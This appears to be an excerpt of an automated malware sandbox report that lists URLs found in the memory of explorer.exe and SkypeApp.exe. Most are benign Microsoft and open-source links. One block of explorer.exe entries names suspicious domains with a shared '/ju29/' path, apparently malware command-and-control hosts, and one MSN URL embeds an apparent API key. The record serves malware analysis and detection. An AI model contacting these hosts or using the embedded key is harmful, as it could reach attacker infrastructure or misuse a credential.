Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sklm888.com/ju29/
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sklm888.com/ju29/www.wokeeducationhateskids.com
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sklm888.comReferer:
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.stringtemplate.org/)
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.townstart.shop
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.townstart.shop/ju29/
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.townstart.shop/ju29/www.gaming-chairs-vn-vi-2885437.fyi
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.townstart.shopReferer:
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.umertazkeer.com
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.umertazkeer.com/ju29/
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.umertazkeer.com/ju29/www.mzfgwh.top
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.umertazkeer.comReferer:
Source: SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.unicode.org/Public/
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3461278497.0000016D90D34000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.unicode.org/Public/.
Source: SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.unicode.org/cldr/data/.
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3461278497.0000016D90D34000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.unicode.org/copyright.html.
Source: SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.unicode.org/reports/
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wokeeducationhateskids.com
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wokeeducationhateskids.com/ju29/
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wokeeducationhateskids.com/ju29/www.umertazkeer.com
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wokeeducationhateskids.comReferer:
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xuangesmd.com
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xuangesmd.com/ju29/
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xuangesmd.com/ju29/www.e9pf4s.top
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xuangesmd.comReferer:
Source: explorer.exe, 00000005.00000003.3204464186.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274294266.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3196363751.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80A08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/skype-coreui-sxbutton-props
Source: SkypeApp.exe, 0000001C.00000003.3207425165.00000175FE800000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80A08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/skype-coreui-sxcolormodels
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://android.googlesource.com/platform/frameworks/opt/telephony/
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://android.googlesource.com/platform/frameworks/support/)
Source: explorer.exe, 00000005.00000000.1237220182.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274217256.000000000913F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: SkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.asm.skype.com/v1/objects/
Source: SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.azms.skypeassets.net/api/
Source: explorer.exe, 00000005.00000003.3196363751.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000005.00000003.3196363751.0000000008DAD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000005.00000003.2274294266.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3204464186.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3196363751.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000005.00000000.1234977867.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.0000000007276000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
Source: explorer.exe, 00000005.00000003.2274294266.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3204464186.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3196363751.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.dev-area.net/2015/08/13/android-4-1-enable-tls-1-1-and-tls-1-2/.
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blueimp.net
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chromium.googlesource.com/breakpad/breakpad/)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://creativecommons.org/.
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3461278497.0000016D90D34000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://creativecommons.org/compatiblelicenses
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://developers.google.com/android/guides/setup)
Source: explorer.exe, 00000005.00000000.1240160729.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3741990027.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: SkypeApp.exe, 0000001C.00000003.3207425165.00000175FE800000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80A08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://feedback.skype.com/survey/answer/sosu
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AzureAD/azure-activedirectory-library-for-dotnet/blob/dev/LICENSE)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AzureAD/azure-activedirectory-library-for-js)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/BVLC/caffe)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/CocoaLumberjack/CocoaLumberjack)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DefinitelyTyped/DefinitelyTyped
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DeividasBakanas
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DovydasNavickas
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Flarna
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Gozala/events)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Hannes-Magnusson-CK
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Maratyszcza/NNPACK)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/NoSQLProvider)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/ReSub)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/ReactXP)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/SimpleRestClients)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/SubscribableEvent)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/SyncTasks)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/dotnet/blob/master/releases/UWP/README.md)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/react-native-windows)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/tslib)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/OfficeDev/office-ui-fabric-react)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/OliverJAsh
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ProjectSeptemberInc/gl-react)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ProjectSeptemberInc/gl-react-native)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Qix-/color)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/STRML/keyMirror)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/SlexAxton/messageformat.js)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Sunnyyoung/SYFlatButton)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/WilcoBakker
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/adjust/react_native_sdk)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/aerofs/react-native-quick-look)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/airbnb/lottie-android)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/airbnb/lottie-ios)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/airbnb/lottie-react-native)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/airbnb/lottie-web)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/airbnb/react-native-maps)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ajafff
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/alinz/react-native-webview-bridge)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/alvis
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/andpor/react-native-sqlite-storage)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/aosp-mirror/platform_development/blob/master/samples/ApiDemos/src/com/example/and
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/archiverjs/node-archiver)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/bamlab/react-native-image-resizer)
